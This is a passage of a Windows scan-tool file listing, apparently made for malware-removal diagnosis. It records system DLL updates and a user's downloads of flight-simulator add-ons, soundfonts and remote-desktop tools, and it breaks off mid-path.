(Microsoft Corporation) C:\WINDOWS\system32\aadtb.dll 2016-10-13 15:28 - 2016-10-05 02:12 - 00998912 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll 2016-10-13 15:28 - 2016-10-05 02:12 - 00924672 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.BackgroundTransfer.dll 2016-10-13 15:28 - 2016-10-05 02:11 - 12174848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll 2016-10-13 15:28 - 2016-10-05 02:11 - 06108672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll 2016-10-13 15:28 - 2016-10-05 02:11 - 06043136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll 2016-10-13 15:28 - 2016-10-05 02:11 - 00640000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MCRecvSrc.dll 2016-10-13 15:28 - 2016-10-05 02:10 - 06474752 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspaint.exe 2016-10-13 15:28 - 2016-10-05 02:09 - 07467520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll 2016-10-13 15:28 - 2016-10-05 02:09 - 03369984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepository.dll 2016-10-13 15:28 - 2016-10-05 02:09 - 00884224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\inetcomm.dll 2016-10-13 15:28 - 2016-10-05 02:09 - 00710144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppointmentApis.dll 2016-10-13 15:28 - 2016-10-05 02:09 - 00691712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msfeeds.dll 2016-10-13 15:28 - 2016-10-05 02:08 - 00873472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll 2016-10-13 15:28 - 2016-10-05 02:07 - 03667456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll 2016-10-13 15:28 - 2016-10-05 02:07 - 02682880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\netshell.dll 2016-10-13 15:28 - 2016-10-05 02:07 - 02646016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CertEnroll.dll 2016-10-13 15:28 - 2016-10-05 02:07 - 00566784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ShareHost.dll 2016-10-13 15:28 - 2016-10-05 02:06 - 02999296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys 2016-10-13 15:28 - 2016-10-05 02:06 - 02254336 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll 2016-10-13 15:28 - 2016-10-05 02:06 - 02005504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll 2016-10-13 15:28 - 2016-10-05 02:06 - 01880576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Logon.dll 2016-10-13 15:28 - 2016-10-05 02:06 - 01594368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\urlmon.dll 2016-10-13 15:28 - 2016-10-05 02:06 - 00850944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ContactApis.dll 2016-10-13 15:28 - 2016-10-05 02:06 - 00711680 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Search.dll 2016-10-13 15:28 - 2016-10-05 02:05 - 03105792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstsc.exe 2016-10-13 15:28 - 2016-10-05 02:05 - 00751104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.BackgroundTransfer.dll 2016-10-13 15:28 - 2016-09-06 22:34 - 00360040 _____ (Microsoft Corporation) C:\WINDOWS\system32\SystemSettingsAdminFlows.exe 2016-10-13 15:27 - 2016-10-05 03:35 - 00279904 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\sdbus.sys 2016-10-13 15:27 - 2016-10-05 03:33 - 00128864 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tm.sys 2016-10-13 15:27 - 2016-10-05 03:30 - 07812448 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe 2016-10-13 15:27 - 2016-10-05 03:22 - 01181536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys 2016-10-13 15:27 - 2016-10-05 03:16 - 00187232 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dumpsd.sys 2016-10-13 15:27 - 2016-10-05 03:12 - 01112928 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppxPackaging.dll 2016-10-13 15:27 - 2016-10-05 03:09 - 04129928 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll 2016-10-13 15:27 - 2016-10-05 03:09 - 01071728 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfnetcore.dll 2016-10-13 15:27 - 2016-10-05 03:09 - 00244816 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll 2016-10-13 15:27 - 2016-10-05 03:08 - 00241504 _____ (Microsoft Corporation) C:\WINDOWS\system32\CloudExperienceHost.dll 2016-10-13 15:27 - 2016-10-05 03:04 - 02537824 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys 2016-10-13 15:27 - 2016-10-05 03:04 - 00628032 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe 2016-10-13 15:27 - 2016-10-05 02:50 - 00116576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostCommon.dll 2016-10-13 15:27 - 2016-10-05 02:49 - 01980768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml6.dll 2016-10-13 15:27 - 2016-10-05 02:48 - 01022304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxPackaging.dll 2016-10-13 15:27 - 2016-10-05 02:46 - 01360456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfnetsrc.dll 2016-10-13 15:27 - 2016-10-05 02:36 - 00128512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\bthpan.sys 2016-10-13 15:27 - 2016-10-05 02:36 - 00073216 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryBroker.dll 2016-10-13 15:27 - 2016-10-05 02:35 - 00352768 _____ (Microsoft Corporation) C:\WINDOWS\system32\cloudAP.dll 2016-10-13 15:27 - 2016-10-05 02:35 - 00122880 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepositoryClient.dll 2016-10-13 15:27 - 2016-10-05 02:34 - 00144896 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dfsc.sys 2016-10-13 15:27 - 2016-10-05 02:32 - 00223744 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.HostName.dll 2016-10-13 15:27 - 2016-10-05 02:31 - 00748544 _____ (Microsoft Corporation) C:\WINDOWS\system32\ChatApis.dll 2016-10-13 15:27 - 2016-10-05 02:31 - 00176128 _____ (Microsoft Corporation) C:\WINDOWS\system32\apprepapi.dll 2016-10-13 15:27 - 2016-10-05 02:31 - 00058880 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ConfigureExpandedStorage.dll 2016-10-13 15:27 - 2016-10-05 02:29 - 09129984 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll 2016-10-13 15:27 - 2016-10-05 02:29 - 06285312 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.dll 2016-10-13 15:27 - 2016-10-05 02:29 - 01145856 _____ (Microsoft Corporation) C:\WINDOWS\system32\EmailApis.dll 2016-10-13 15:27 - 2016-10-05 02:28 - 03059200 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll 2016-10-13 15:27 - 2016-10-05 02:28 - 00775168 _____ (Microsoft Corporation) C:\WINDOWS\system32\GamePanel.exe 2016-10-13 15:27 - 2016-10-05 02:28 - 00406016 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentClient.dll 2016-10-13 15:27 - 2016-10-05 02:28 - 00123904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.HostName.dll 2016-10-13 15:27 - 2016-10-05 02:27 - 00087040 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.ServiceDiscovery.Dnssd.dll 2016-10-13 15:27 - 2016-10-05 02:26 - 00182784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsensorgroup.dll 2016-10-13 15:27 - 2016-10-05 02:23 - 01908224 _____ (Microsoft Corporation) C:\WINDOWS\system32\AzureSettingSyncProvider.dll 2016-10-13 15:27 - 2016-10-05 02:22 - 07654912 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll 2016-10-13 15:27 - 2016-10-05 02:22 - 04749312 _____ (Microsoft Corporation) C:\WINDOWS\system32\SettingsHandlers_nt.dll 2016-10-13 15:27 - 2016-10-05 02:22 - 00073216 _____ (Microsoft Corporation) C:\WINDOWS\system32\offreg.dll 2016-10-13 15:27 - 2016-10-05 02:21 - 00310272 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppXDeploymentClient.dll 2016-10-13 15:27 - 2016-10-05 02:21 - 00167936 _____ (Microsoft Corporation) C:\WINDOWS\system32\ErrorDetails.dll 2016-10-13 15:27 - 2016-10-05 02:20 - 00936960 _____ (Microsoft Corporation) C:\WINDOWS\system32\MCRecvSrc.dll 2016-10-13 15:27 - 2016-10-05 02:18 - 01656832 _____ (Microsoft Corporation) C:\WINDOWS\system32\GdiPlus.dll 2016-10-13 15:27 - 2016-10-05 02:17 - 04136960 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepository.dll 2016-10-13 15:27 - 2016-10-05 02:17 - 00089088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\adsmsext.dll 2016-10-13 15:27 - 2016-10-05 02:16 - 06664192 _____ (Microsoft Corporation) C:\WINDOWS\system32\mspaint.exe 2016-10-13 15:27 - 2016-10-05 02:16 - 00771072 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppointmentApis.dll 2016-10-13 15:27 - 2016-10-05 02:15 - 03617792 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys 2016-10-13 15:27 - 2016-10-05 02:15 - 01840640 _____ (Microsoft Corporation) C:\WINDOWS\system32\FntCache.dll 2016-10-13 15:27 - 2016-10-05 02:15 - 00833024 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32spl.dll 2016-10-13 15:27 - 2016-10-05 02:15 - 00716800 _____ (Microsoft Corporation) C:\WINDOWS\system32\ShareHost.dll 2016-10-13 15:27 - 2016-10-05 02:14 - 01456640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll 2016-10-13 15:27 - 2016-10-05 02:14 - 01013760 _____ (Microsoft Corporation) C:\WINDOWS\system32\ContactApis.dll 2016-10-13 15:27 - 2016-10-05 02:14 - 00701952 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Networking.Connectivity.dll 2016-10-13 15:27 - 2016-10-05 02:11 - 03496960 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSVidCtl.dll 2016-10-13 15:27 - 2016-10-05 02:09 - 00674304 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.dll 2016-10-13 15:27 - 2016-10-05 02:08 - 02356736 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSVidCtl.dll 2016-10-13 15:27 - 2016-10-05 02:08 - 00598528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.dll 2016-10-13 15:27 - 2016-10-05 02:07 - 00589312 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Devices.Sensors.dll 2016-10-13 15:27 - 2016-10-05 02:07 - 00542208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Networking.Connectivity.dll 2016-10-13 15:27 - 2016-10-05 02:06 - 01013248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Web.Http.dll 2016-10-13 15:27 - 2016-10-04 17:01 - 00446124 _____ C:\WINDOWS\system32\ApnDatabase.xml 2016-10-13 15:08 - 2016-10-13 15:27 - 74538332 _____ C:\Users\Kyle Aniel\Downloads\ready_for_pushback_boeing_747-200v2_fs2004.zip 2016-10-11 21:35 - 2016-10-11 22:09 - 101448493 _____ C:\Users\Kyle Aniel\Downloads\MD-8x.rar 2016-10-11 21:17 - 2016-10-11 21:17 - 23402545 _____ (Markus Schwenk) C:\Users\Kyle Aniel\Downloads\MidiEditor-3.0.0-Setup.exe 2016-10-11 14:24 - 2016-10-11 14:24 - 00000000 ____D C:\Users\Kyle Aniel\Documents\test 2016-10-11 14:08 - 2016-10-11 14:42 - 63307776 _____ C:\Users\Kyle Aniel\Downloads\Fsx - md 80.rar 2016-10-11 14:08 - 2016-10-11 14:08 - 00019924 _____ C:\Users\Kyle Aniel\Downloads\f-s-x-flight-1-super-md-80.torrent 2016-10-10 21:33 - 2016-10-10 21:33 - 00155346 _____ C:\Users\Kyle Aniel\Downloads\1476160139_J0OdkDfEzHBASpqKICO9_tr.mid 2016-10-10 21:33 - 2016-10-10 21:33 - 00155346 _____ C:\Users\Kyle Aniel\Downloads\1476160139_J0OdkDfEzHBASpqKICO9_tr (1).mid 2016-10-10 21:21 - 2016-10-10 21:22 - 116153496 _____ C:\Users\Kyle Aniel\Downloads\Orchestra Soundfont 2 COMBO.sf2 2016-10-10 21:14 - 2016-10-10 21:15 - 148358590 _____ C:\Users\Kyle Aniel\Downloads\FluidR3_GM.sf2 2016-10-10 21:10 - 2016-10-10 21:14 - 75148691 _____ C:\Users\Kyle Aniel\Downloads\FluidR3_GM.sfArk 2016-10-10 21:08 - 2016-10-10 21:08 - 12189088 _____ C:\Users\Kyle Aniel\Downloads\Chaos_V20.sf2 2016-10-10 21:06 - 2016-10-18 19:38 - 00001977 _____ C:\Users\banie_000\Desktop\SynthFont.lnk 2016-10-10 21:06 - 2016-10-10 21:07 - 00000000 ____D C:\Users\banie_000\AppData\Roaming\SynthFont 2016-10-10 21:06 - 2016-10-10 21:06 - 07479100 _____ (Kenneth Rundt) C:\Users\Kyle Aniel\Downloads\SynthFontSetup.exe 2016-10-10 21:06 - 2016-10-10 21:06 - 00000000 ____D C:\Users\banie_000\Documents\SynthFont 2016-10-10 21:06 - 2016-10-10 21:06 - 00000000 ____D C:\Users\banie_000\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SynthFont 2016-10-10 21:06 - 2016-10-10 21:06 - 00000000 ____D C:\Program Files (x86)\SynthFont 2016-10-10 21:04 - 2016-10-10 21:05 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\SFPACK 2016-10-10 21:04 - 2016-10-10 21:04 - 00000752 _____ C:\Users\Kyle Aniel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SFPack.lnk 2016-10-10 21:03 - 2016-10-10 21:03 - 06823140 _____ C:\Users\Kyle Aniel\Downloads\Chaos_V20.sfArk 2016-10-10 21:03 - 2016-10-10 21:03 - 00110774 _____ C:\Users\Kyle Aniel\Downloads\SFPACK.zip 2016-10-10 20:51 - 2016-10-11 21:23 - 00178744 _____ C:\Users\Kyle Aniel\Downloads\25287_Rhapsody-in-Blue.mid 2016-10-09 22:54 - 2016-10-09 22:54 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\sas_md81 2016-10-09 22:27 - 2016-10-09 22:51 - 73172380 _____ C:\Users\Kyle Aniel\Downloads\sas_md81.zip 2016-10-09 22:11 - 2016-10-09 22:11 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Blender 2016-10-09 22:10 - 2016-10-09 22:10 - 00000000 ____D C:\Program Files\Blender Foundation 2016-10-09 22:08 - 2016-10-09 22:59 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\md80-88_pack_v2 2016-10-09 22:08 - 2016-10-09 22:09 - 89464832 _____ C:\Users\Kyle Aniel\Downloads\blender-2.78-windows64.msi 2016-10-09 22:05 - 2016-10-09 22:07 - 86701411 _____ C:\Users\Kyle Aniel\Downloads\md80-88_pack_v2.zip 2016-10-09 17:02 - 2016-10-09 17:02 - 00015413 _____ C:\Users\Kyle Aniel\Downloads\c-l-s-m-d82-jet-liner.torrent 2016-10-09 16:32 - 2016-10-09 16:34 - 146373100 _____ C:\Users\Kyle Aniel\Downloads\CLS MD 81.rar 2016-10-09 16:31 - 2016-10-09 16:31 - 03833515 _____ C:\Users\Kyle Aniel\Downloads\FSUIPC4.40.rar 2016-10-09 16:30 - 2016-10-09 16:30 - 00001827 _____ C:\Users\Kyle Aniel\Downloads\f-s9-f-s-x-f-s-u-i-p-c-440.torrent 2016-10-08 23:05 - 2016-10-08 23:05 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\44936-B737-800 2016-10-08 23:04 - 2016-10-08 23:05 - 02745258 _____ C:\Users\Kyle Aniel\Downloads\44936-B737-800.zip 2016-10-08 22:57 - 2016-10-08 22:57 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\FSND_FSX-B737Upgraded_Cockpit 2016-10-08 22:56 - 2016-10-08 22:56 - 25298732 _____ C:\Users\Kyle Aniel\Downloads\FSND_FSX-B737Upgraded_Cockpit.zip 2016-10-08 18:36 - 2016-10-08 18:36 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\CLSMD80&87 2016-10-08 18:30 - 2016-10-08 18:30 - 00017879 _____ C:\Users\Kyle Aniel\Downloads\[torrenty.to] [FSX]CLS MD81-82 and MD87 with serial.torrent 2016-10-08 17:50 - 2016-10-19 15:14 - 00000000 ____D C:\Users\Kyle Aniel\Desktop\JustFlight 2016-10-08 17:37 - 2016-10-08 17:47 - 1172939413 _____ C:\Users\Kyle Aniel\Downloads\JF Tristar by iTrekx.rar 2016-10-08 17:28 - 2016-10-08 17:28 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\toml1011 2016-10-08 17:27 - 2016-10-08 17:27 - 10282684 _____ C:\Users\Kyle Aniel\Downloads\toml1011.zip 2016-10-08 17:06 - 2016-10-08 17:06 - 00599420 _____ C:\Users\Kyle Aniel\Downloads\[Free-scores.com]_gershwin-george-rhapsody-in-blue-31021.pdf 2016-10-08 16:20 - 2016-10-16 06:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\aerosoft 2016-10-08 16:00 - 2015-04-17 13:46 - 00000000 ____D C:\Users\Kyle Aniel\Documents\Aerosoft 2016-10-08 14:40 - 2016-10-08 14:40 - 01360299 _____ C:\Users\Kyle Aniel\Downloads\sky-textures-for-enb-series_12.zip 2016-10-08 14:14 - 2016-10-08 14:14 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\738BLACKPANELFIX 2016-10-08 14:12 - 2016-10-08 14:13 - 02986348 _____ C:\Users\Kyle Aniel\Downloads\738BLACKPANELFIX.zip 2016-10-08 13:51 - 2016-10-08 13:51 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\CanjetBoeing738FSX 2016-10-08 13:11 - 2016-10-08 13:50 - 118588938 _____ C:\Users\Kyle Aniel\Downloads\CanjetBoeing738FSX.zip 2016-10-08 12:22 - 2016-10-08 15:04 - 00000000 ____D C:\ProgramData\firebird 2016-10-08 12:21 - 2016-10-18 19:38 - 00000650 _____ C:\Users\banie_000\Desktop\PRO-ATC-X.lnk 2016-10-08 12:21 - 2016-10-08 12:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\PRO-ATC-X 2016-10-08 12:18 - 2016-10-08 12:41 - 00000000 ____D C:\PRO-ATC-X 2016-10-08 12:08 - 2016-10-08 12:08 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\Pointsoft-Pro-ATC-X.v1.2.3.8 2016-10-08 11:46 - 2016-10-08 11:51 - 236842241 _____ C:\Users\Kyle Aniel\Downloads\Pointsoft-Pro-ATC-X.v1.2.3.8.zip 2016-10-08 11:45 - 2016-10-08 11:45 - 00018526 _____ C:\Users\Kyle Aniel\Downloads\[www.seedpeer.eu] Fsx P3d Pointsoft Pro Atc X V1 2 3 8.SEEDPEER.torrent 2016-10-08 09:29 - 2016-10-08 09:30 - 68343766 _____ C:\Users\Kyle Aniel\Downloads\FSX How to autoland (ILS land) EASY - Tutorial.mp4 2016-10-08 09:28 - 2016-10-08 09:28 - 00002847 _____ C:\Users\Kyle Aniel\Downloads\mfp.htm 2016-10-08 07:21 - 2016-10-08 07:22 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\aa738908nn-x-fsrepaintsger 2016-10-08 07:16 - 2016-10-08 07:20 - 09618253 _____ C:\Users\Kyle Aniel\Downloads\aa738908nn-x-fsrepaintsger.zip 2016-10-07 23:27 - 2016-10-07 23:27 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\b738american_fsx 2016-10-07 23:17 - 2016-10-07 23:26 - 27010695 _____ C:\Users\Kyle Aniel\Downloads\b738american_fsx.zip 2016-10-07 23:07 - 2016-10-07 23:07 - 16120277 _____ C:\Users\Kyle Aniel\Downloads\tds_boeing_737-800_american_n969nn (1).zip 2016-10-07 23:01 - 2016-10-07 23:01 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\posky_boeing_737-800_okay_airways_fsx 2016-10-07 22:59 - 2016-10-07 22:59 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\FSX Cracks para todas las verciones 2016-10-07 22:58 - 2016-10-07 22:58 - 06235914 _____ C:\Users\Kyle Aniel\Downloads\FSX Cracks para todas las verciones.rar 2016-10-07 22:57 - 2016-10-07 23:00 - 16161514 _____ C:\Users\Kyle Aniel\Downloads\posky_boeing_737-800_okay_airways_fsx.zip 2016-10-07 22:38 - 2016-10-07 22:39 - 13630490 _____ C:\Users\Kyle Aniel\Downloads\tds738_aal_318440 (1).zip 2016-10-07 22:36 - 2016-10-07 22:36 - 14138519 _____ C:\Users\Kyle Aniel\Downloads\american_n932an (1).zip 2016-10-07 22:35 - 2016-10-07 22:35 - 16120354 _____ C:\Users\Kyle Aniel\Downloads\tds_boeing_737-800_american_n969nn.zip 2016-10-07 22:34 - 2016-10-07 22:35 - 09891996 _____ C:\Users\Kyle Aniel\Downloads\tds738_american_airlines.zip 2016-10-07 22:34 - 2016-10-07 22:34 - 11109908 _____ C:\Users\Kyle Aniel\Downloads\tds737-800aal-twa.zip 2016-10-07 22:34 - 2016-10-07 22:34 - 09932969 _____ C:\Users\Kyle Aniel\Downloads\tds737-800aal-renoair.zip 2016-10-07 22:33 - 2016-10-07 22:33 - 14138519 _____ C:\Users\Kyle Aniel\Downloads\american_n932an.zip 2016-10-07 22:33 - 2016-10-07 22:33 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\american_n932an 2016-10-07 22:32 - 2016-10-07 22:33 - 13630490 _____ C:\Users\Kyle Aniel\Downloads\tds738_aal_318440.zip 2016-10-07 22:27 - 2016-10-07 22:27 - 13969822 _____ C:\Users\Kyle Aniel\Downloads\TDS-737-800WL-American-Airlines-N909NN.zip 2016-10-07 22:26 - 2016-10-07 22:26 - 20893343 _____ C:\Users\Kyle Aniel\Downloads\TDS-737-800WL-American-Airlines-N925NN.zip 2016-10-07 21:48 - 2016-10-07 21:55 - 939436352 _____ (Acresso Software Inc. ) C:\Users\Kyle Aniel\Downloads\AS_AIRBUS-X-EXTENDED_FSX-P3D_V115 (1).exe 2016-10-07 21:25 - 2016-10-07 21:31 - 939436352 _____ (Acresso Software Inc. ) C:\Users\Kyle Aniel\Downloads\AS_AIRBUS-X-EXTENDED_FSX-P3D_V115.exe 2016-10-07 21:17 - 2016-10-07 21:18 - 305520897 _____ C:\Users\Kyle Aniel\AppData\Local\ACCCx3_8_0_310.zip.aamdownload 2016-10-07 21:17 - 2016-10-07 21:18 - 00003413 _____ C:\Users\Kyle Aniel\AppData\Local\ACCCx3_8_0_310.zip.aamdownload.aamd 2016-10-07 20:58 - 2016-10-18 19:38 - 00001225 _____ C:\Users\banie_000\Desktop\Continue AndyOS Installation.lnk 2016-10-06 18:03 - 2016-10-06 18:03 - 02727678 _____ C:\Users\Kyle Aniel\Downloads\44582-B737-800.zip 2016-10-06 18:03 - 2016-10-06 18:03 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\44582-B737-800 2016-10-06 17:59 - 2016-10-06 17:59 - 00000000 ____D C:\Users\Kyle Aniel\Downloads\default_737_vc_gray_upgrade_texture 2016-10-06 17:58 - 2016-10-06 17:58 - 14710813 _____ C:\Users\Kyle Aniel\Downloads\default_737_vc_gray_upgrade_texture.zip 2016-10-05 21:44 - 2016-10-05 21:44 - 05128495 _____ C:\Users\Kyle Aniel\Downloads\Windows 8 to OS X Yosemite (5th Edition).pdf 2016-10-05 18:12 - 2016-10-18 19:40 - 00001919 _____ C:\Users\Public\Desktop\BlueStacks.lnk 2016-10-05 18:12 - 2016-10-18 19:39 - 00001931 _____ C:\ProgramData\Microsoft\Windows\Start Menu\BlueStacks.lnk 2016-10-05 17:57 - 2016-10-05 18:12 - 00000000 ____D C:\Program Files (x86)\Bluestacks 2016-10-05 17:57 - 2016-09-29 07:00 - 00000000 ____D C:\ProgramData\Bluestacks 2016-10-05 17:55 - 2016-10-05 17:57 - 322368136 _____ (BlueStack Systems Inc.) C:\Users\Kyle Aniel\Downloads\BlueStacks2_native_5740d773271a7331d8c1a4ebc64792e5.exe 2016-10-05 05:34 - 2016-10-06 15:55 - 00000000 ____D C:\Users\Kyle Aniel\Desktop\New folder 2016-10-04 19:59 - 2016-10-04 19:59 - 00597304 _____ C:\Users\Kyle Aniel\Downloads\flux-setup.exe 2016-10-04 19:59 - 2016-10-04 19:59 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Flux 2016-10-04 19:59 - 2016-10-04 19:59 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\FluxSoftware 2016-10-04 19:43 - 2016-10-04 19:43 - 00000000 ___HD C:\$Windows.~WS 2016-10-04 19:42 - 2016-10-04 19:44 - 00000000 ____D C:\ESD 2016-10-04 19:41 - 2016-10-04 19:41 - 18309328 _____ (Microsoft Corporation) C:\Users\Kyle Aniel\Downloads\MediaCreationTool (1).exe 2016-10-04 19:35 - 2016-10-18 19:40 - 00001150 _____ C:\Users\Public\Desktop\Oracle VM VirtualBox.lnk 2016-10-04 19:35 - 2016-10-04 19:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Oracle VM VirtualBox 2016-10-04 19:35 - 2016-10-04 19:35 - 00000000 ____D C:\Program Files\Oracle 2016-10-04 19:35 - 2016-09-12 18:18 - 00920168 _____ (Oracle Corporation) C:\WINDOWS\system32\Drivers\VBoxDrv.sys 2016-10-04 19:35 - 2016-09-12 18:17 - 00149256 _____ (Oracle Corporation) C:\WINDOWS\system32\Drivers\VBoxUSBMon.sys 2016-10-04 19:34 - 2016-10-04 19:35 - 122288608 _____ (Oracle Corporation) C:\Users\Kyle Aniel\Downloads\VirtualBox-5.1.6-110634-Win.exe 2016-10-04 19:15 - 2016-10-04 19:15 - 01409778 _____ C:\Users\Kyle Aniel\Downloads\CA_U2M04L01_TE.pdf 2016-10-04 14:07 - 2016-10-04 14:07 - 18309328 _____ (Microsoft Corporation) C:\Users\Kyle Aniel\Downloads\MediaCreationTool.exe 2016-10-04 14:07 - 2016-10-04 14:07 - 00000000 ____D C:\$WINDOWS.~BT 2016-10-04 13:44 - 2016-10-04 13:44 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\Splashtop 2016-10-04 13:42 - 2016-10-04 13:42 - 00000000 ____D C:\ProgramData\Splashtop 2016-10-04 13:42 - 2016-10-04 13:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Splashtop Remote 2016-10-04 13:42 - 2016-10-04 13:42 - 00000000 ____D C:\Program Files (x86)\Splashtop 2016-10-04 13:41 - 2016-10-04 13:41 - 25636832 _____ (Splashtop Inc.) C:\Users\Kyle Aniel\Downloads\Splashtop_Streamer_Windows_v3.1.0.0.exe 2016-10-03 19:55 - 2016-10-03 19:55 - 00000000 ____D C:\ProgramData\Google 2016-10-03 19:50 - 2016-10-03 19:50 - 12427264 _____ C:\Users\Kyle Aniel\Downloads\chromeremotedesktophost.msi 2016-10-03 19:46 - 2016-10-03 19:47 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Local\Deployment 2016-10-03 19:46 - 2016-10-03 19:46 - 00016108 _____ C:\Users\Kyle Aniel\Downloads\rdassistant.application 2016-10-03 19:46 - 2016-10-03 19:46 - 00000000 ____D C:\Users\Kyle Aniel\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Remote Desktop assistant 2016-10-03 19:40 - 2016-10-03 19:40 - 00000000 ____H C:\Users\Kyle Aniel\Documents\Default.rdp 2016-10-03 19:37 - 2016-10-20 05:19 - 00004020 _____ C:\WINDOWS\System32\Tasks\Intel Security DAT Reputation (AMCore) periodic endpoint safety pulse 2016-10-02 20:57 - 2016-10-02 20:57 - 00000000 ____D C:\Program Files\SxS 2016-10-02 20:57 - 2016-10-02 20:57 - 00000000 ____D C:\Program Files\Shapes 2016-10-02 20:57 - 2016-10-02 20:57 - 00000000 ____D C:\Program Files\resx 2016-10-02 20:57 - 2016-10-02 20:57 - 00000000 ____D C:\Program Files\Resources 2016-10-02 20:57 - 2016-10-02 20:57 - 00000000 ____D C:\Program Files\FileTypes 2016-10-02 20:57 - 2016-10-02 20:57 - 00000000 ____D C:\Program Files\Effects 2016-10-02 18:47 - 2016-10-02 18:47 - 00000000 ____D C:\Users\Kyle 